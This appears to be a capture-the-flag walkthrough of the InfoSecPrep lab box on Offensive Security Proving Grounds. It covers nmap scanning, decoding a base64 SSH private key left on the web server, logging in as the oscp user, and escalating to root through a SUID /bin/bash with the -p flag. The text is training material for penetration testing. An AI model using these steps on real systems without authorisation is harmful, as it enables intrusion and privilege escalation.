PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through InfoSecPrep box, produced by FalconSpy and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is a kind of boot2root, easy and fun box. Hope you enjoy reading the walkthrough!
As we are already provided with IP address of the box, we will scan it via Nmap.
We are going to scan the IP for 1000 default ports by typing the following command on our terminal.
After waiting for a while, we have got our results as shown below:
To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 22,80 192.168.x.x -sV -sC
In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Moreover, we already see a page named secret.txt, which shows where we should start first.
We open our browser and type IP address of the box.
We see that it is a WordPress CMS, before enumerating further, we check /secret.txt file as we saw it in the first place on nmap scan.
We come accross an encoded string. The string ends with two equal signs which indicates that it is encoded in base64.
We will curl the link to get string on our terminal.
Now, we will curl the link again, but we will pipe it through base64 command and use -d argument in order to decode the string.
curl http://192.168.x.x/secret.txt | base64 -d
Now, we see that it is an SSH private key, which is probably our way to get a low shell on the machine.
We will enumerate the page further in order to get possible users on the box. We see that there is a note written on the homepage that says the only user on the box is oscp.
We will copy SSH private key we decoded into a file, and we will try to log in on the box as oscp user after chmoding the private key.
Now we are ready to build a connection to the box with the following command.
ssh -i private.key firstname.lastname@example.org
We successfuly connect to the box, now we will get our low shell hash.
After checking common vulnerabilities or misconfigurations, we find that /bin/bash is a very important SUID binary, which gives us the opportunity to escalate our privilege on the box.
find / -perm -u=s -type f 2>/dev/null
For SUID binaries, we generally check GTFOBins since it provides a plethora of privilege escalation commands for SUID binaries found on the target systems.
And we see that we are able to escalate our privilege on the machine just providing -p argument following /bin/bash.
So, we execute the command as follows:
And our EUID and EGID now have root privileges.
So, we get our root hash.
Now we have full authority on the box. Enjoy!
Basic Linux Privilege Escalation
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this…
Nmap: the Network Mapper - Free Security Scanner
Nmap 7.90 has been released with Npcap 1.00 along with dozens of other performance improvements, bug fixes, and feature…
Proving Grounds Play and Practice | Offensive Security
Practice your pentesting skills in a standalone, private lab environment with the additions of PG Play and PG Practice…
bash | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a…
Blog Tool, Publishing Platform, and CMS - WordPress
WordPress is open source software you can use to create a beautiful website, blog, or app. Beautiful designs, powerful…
Base64 - Wikipedia
In programming, Base64 is a group of binary-to-text encoding schemes that represent binary data (more specifically, a…
command line tool and library for transferring data with URLs(since 1998) Supports... DICT, FILE, FTP, FTPS, GOPHER…
Pipe, Grep and Sort Command in Linux/Unix with Examples
In this tutorial, we will learn- The Pipe is a command in Linux that lets you use two or more commands such that output…
Secure Shell Protocol - Wikipedia
The Secure Shell Protocol ( SSH) is a cryptographic network protocol for operating network services securely over an…
Penetration Testing with Kali Linux (PWK) | Offensive Security
Penetration Testing with Kali Linux The industry-leading Penetration Testing with Kali Linux (PWK/PEN-200) course just…